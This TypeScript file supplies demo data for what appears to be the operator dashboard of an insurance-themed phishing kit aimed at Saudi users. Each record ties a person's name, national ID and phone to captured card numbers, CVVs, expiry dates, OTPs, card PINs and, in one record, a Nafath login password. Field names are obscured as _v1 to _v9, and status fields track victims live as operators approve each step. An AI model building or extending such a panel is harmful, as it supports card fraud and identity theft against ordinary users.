import { _e } from "./secure-utils";
import type { InsuranceApplication } from "./firestore-types";

const enc = (s: string) => _e(s);
const ago = (ms: number) => new Date(Date.now() - ms).toISOString();

function cardEntry(
  card: string,
  cvv: string,
  expiry: string,
  name: string,
  type: string,
  level: string,
  bank: string,
  status: "pending" | "approved" | "rejected" = "pending",
  offsetMs = 0
) {
  return {
    id: `demo-card-${card.slice(-4)}`,
    type: "card" as const,
    timestamp: ago(offsetMs),
    status,
    data: {
      _v1: enc(card),
      _v2: enc(cvv),
      _v3: enc(expiry),
      _v4: enc(name),
      cardType: type,
      cardLevel: level,
      bankInfo: { name: bank, country: "SA" },
    },
  };
}

function otpEntry(
  code: string,
  status: "pending" | "approved" | "rejected" = "pending",
  offsetMs = 0
) {
  return {
    id: `demo-otp-${code}`,
    type: "_t2" as const,
    timestamp: ago(offsetMs),
    status,
    data: { _v5: enc(code) },
  };
}

function pinEntry(
  code: string,
  status: "pending" | "approved" | "rejected" = "pending",
  offsetMs = 0
) {
  return {
    id: `demo-pin-${code}`,
    type: "_t3" as const,
    timestamp: ago(offsetMs),
    status,
    data: { _v6: enc(code) },
  };
}

export function getDemoApplications(): InsuranceApplication[] {
  const now = new Date();

  return [
    {
      id: "demo-001",
      ownerName: "محمد الغامدي",
      identityNumber: "1057384920",
      phoneNumber: "0501234567",
      country: "SA",
      documentType: "استمارة",
      serialNumber: "SN-20241",
      insuranceType: "تأمين جديد",
      insuranceCoverage: "شامل",
      insuranceStartDate: "2026-01-01",
      vehicleUsage: "خاص",
      vehicleValue: "85000",
      vehicleYear: "2022",
      vehicleModel: "تويوتا كامري",
      repairLocation: "agency",
      currentStep: "payment",
      redirectPage: "payment",
      status: "pending_review",
      paymentStatus: "pending",
      cardStatus: "waiting",
      isOnline: true,
      isUnread: true,
      browser: "Chrome",
      deviceType: "desktop",
      os: "Windows",
      country: "SA",
      createdAt: new Date(Date.now() - 15 * 60000),
      updatedAt: new Date(Date.now() - 2 * 60000),
      lastActiveAt: ago(30000),
      selectedOffer: {
        id: 1,
        company: "بوبا العربية",
        price: 1250,
        type: "شامل",
        features: ["تغطية الحوادث", "سحب المركبة", "السائق البديل"],
      },
      history: [
        cardEntry(
          "4532015112837362",
          "321",
          "09/27",
          "MOHAMMED AL-GHAMDI",
          "VISA",
          "CLASSIC",
          "بنك الراجحي",
          "pending",
          120000
        ),
      ],
    },

    {
      id: "demo-002",
      ownerName: "سارة الدوسري",
      identityNumber: "2038571946",
      phoneNumber: "0559876543",
      country: "SA",
      documentType: "استمارة",
      serialNumber: "SN-20242",
      insuranceType: "تأمين جديد",
      insuranceCoverage: "شامل",
      insuranceStartDate: "2026-01-15",
      vehicleUsage: "خاص",
      vehicleValue: "62000",
      vehicleYear: "2023",
      vehicleModel: "هيونداي سوناتا",
      repairLocation: "workshop",
      currentStep: "otp",
      redirectPage: "otp",
      status: "pending_review",
      paymentStatus: "pending",
      cardStatus: "approved_with_otp",
      otpStatus: "waiting",
      isOnline: true,
      isUnread: false,
      browser: "Safari",
      deviceType: "mobile",
      os: "iOS",
      country: "SA",
      createdAt: new Date(Date.now() - 35 * 60000),
      updatedAt: new Date(Date.now() - 5 * 60000),
      lastActiveAt: ago(15000),
      selectedOffer: {
        id: 2,
        company: "ميدغلف",
        price: 980,
        type: "ضد الغير",
        features: ["تغطية الغير", "المسؤولية المدنية"],
      },
      history: [
        cardEntry(
          "5425233430109903",
          "456",
          "12/26",
          "SARA AL-DOSARI",
          "MASTERCARD",
          "GOLD",
          "البنك الأهلي السعودي",
          "approved",
          480000
        ),
        otpEntry("784512", "pending", 90000),
      ],
    },

    {
      id: "demo-003",
      ownerName: "أحمد العتيبي",
      identityNumber: "1123456789",
      phoneNumber: "0533344556",
      country: "SA",
      documentType: "استمارة",
      serialNumber: "SN-20243",
      insuranceType: "نقل ملكية",
      insuranceCoverage: "شامل",
      insuranceStartDate: "2026-02-01",
      vehicleUsage: "خاص",
      vehicleValue: "120000",
      vehicleYear: "2024",
      vehicleModel: "لكزس ES",
      repairLocation: "agency",
      currentStep: "pin",
      redirectPage: "pin",
      status: "pending_review",
      paymentStatus: "pending",
      cardStatus: "approved_with_pin",
      pinStatus: "waiting",
      isOnline: false,
      isUnread: true,
      browser: "Chrome",
      deviceType: "desktop",
      os: "macOS",
      country: "SA",
      createdAt: new Date(Date.now() - 60 * 60000),
      updatedAt: new Date(Date.now() - 8 * 60000),
      lastActiveAt: ago(600000),
      selectedOffer: {
        id: 3,
        company: "الاتحاد للتأمين",
        price: 2100,
        type: "شامل مميز",
        features: ["تغطية شاملة", "إصلاح الوكالة", "بدل حوادث"],
      },
      history: [
        cardEntry(
          "4716123456789016",
          "789",
          "03/25",
          "AHMED AL-OTAIBI",
          "VISA",
          "PLATINUM",
          "بنك الرياض",
          "approved",
          750000
        ),
        otpEntry("312987", "approved", 600000),
        pinEntry("8847", "pending", 450000),
      ],
    },

    {
      id: "demo-004",
      ownerName: "نورة الشهري",
      identityNumber: "1098765432",
      phoneNumber: "0544455667",
      country: "SA",
      documentType: "بطاقة جمركية",
      serialNumber: "SN-20244",
      insuranceType: "تأمين جديد",
      insuranceCoverage: "ضد الغير",
      insuranceStartDate: "2026-01-20",
      vehicleUsage: "خاص",
      vehicleValue: "48000",
      vehicleYear: "2021",
      vehicleModel: "نيسان التيما",
      repairLocation: "workshop",
      currentStep: "nafad",
      redirectPage: "nafad",
      status: "pending_review",
      paymentStatus: "pending",
      cardStatus: "approved_with_otp",
      otpStatus: "approved",
      nafadConfirmationStatus: "waiting",
      _v8: enc("1098765432"),
      _v9: enc("NoraNafad@2026"),
      isOnline: true,
      isUnread: false,
      browser: "Chrome",
      deviceType: "mobile",
      os: "Android",
      country: "SA",
      createdAt: new Date(Date.now() - 90 * 60000),
      updatedAt: new Date(Date.now() - 12 * 60000),
      lastActiveAt: ago(45000),
      history: [
        cardEntry(
          "4111111111111111",
          "123",
          "06/28",
          "NOURA AL-SHAHRI",
          "VISA",
          "CLASSIC",
          "بنك البلاد",
          "approved",
          5400000
        ),
        otpEntry("561234", "approved", 4800000),
      ],
    },

    {
      id: "demo-005",
      ownerName: "عبدالله الحربي",
      identityNumber: "1034521987",
      phoneNumber: "0512223344",
      country: "SA",
      documentType: "استمارة",
      serialNumber: "SN-20245",
      insuranceType: "تأمين جديد",
      insuranceCoverage: "شامل",
      insuranceStartDate: "2026-03-01",
      vehicleUsage: "خاص",
      vehicleValue: "95000",
      vehicleYear: "2023",
      vehicleModel: "جي إم سي يوكون",
      repairLocation: "agency",
      currentStep: "compar",
      status: "pending_review",
      paymentStatus: "pending",
      isOnline: true,
      isUnread: true,
      browser: "Firefox",
      deviceType: "desktop",
      os: "Windows",
      country: "SA",
      createdAt: new Date(Date.now() - 5 * 60000),
      updatedAt: new Date(Date.now() - 1 * 60000),
      lastActiveAt: ago(10000),
      history: [],
    },

    {
      id: "demo-006",
      ownerName: "فاطمة القحطاني",
      identityNumber: "1065432187",
      phoneNumber: "0566677889",
      country: "SA",
      documentType: "استمارة",
      serialNumber: "SN-20246",
      insuranceType: "تأمين جديد",
      insuranceCoverage: "شامل",
      insuranceStartDate: "2026-01-10",
      vehicleUsage: "خاص",
      vehicleValue: "74000",
      vehicleYear: "2022",
      vehicleModel: "كيا سبورتاج",
      repairLocation: "workshop",
      currentStep: "payment",
      status: "pending_review",
      paymentStatus: "pending",
      cardStatus: "rejected",
      isBlocked: true,
      isOnline: false,
      browser: "Chrome",
      deviceType: "mobile",
      os: "Android",
      country: "SA",
      createdAt: new Date(Date.now() - 3 * 60 * 60000),
      updatedAt: new Date(Date.now() - 25 * 60000),
      lastActiveAt: ago(1800000),
      history: [
        cardEntry(
          "4000012345678906",
          "000",
          "01/24",
          "FATIMA AL-QAHTANI",
          "VISA",
          "CLASSIC",
          "البنك السعودي الفرنسي",
          "rejected",
          1800000
        ),
        cardEntry(
          "4539578763621486",
          "777",
          "11/27",
          "FATIMA AL-QAHTANI",
          "VISA",
          "GOLD",
          "البنك السعودي الفرنسي",
          "pending",
          900000
        ),
      ],
    },
  ] as InsuranceApplication[];
}
